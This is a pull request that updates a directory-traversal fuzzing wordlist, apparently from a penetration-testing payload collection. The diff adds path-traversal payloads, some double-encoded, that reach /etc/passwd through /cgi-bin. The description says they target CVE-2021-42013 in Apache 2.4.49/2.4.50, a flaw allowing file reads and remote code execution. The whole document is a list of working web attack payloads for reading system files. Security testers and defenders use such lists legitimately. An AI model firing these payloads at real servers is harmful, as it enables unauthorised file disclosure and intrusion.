### PR TITLE
Update directory traversal wordlist

### DIFF
--- a/Directory Traversal/Intruder/directory_traversal.txt
+++ b/Directory Traversal/Intruder/directory_traversal.txt
@@ -131,3 +131,10 @@ C:\boot.ini
 ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd


### PR DESCRIPTION
Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE into Apache 2.4.49/2.4.50).
Also add some depth to the current fuzzing payloads to not miss /cgi-bin directories which are located deeper than 4 subdirectories.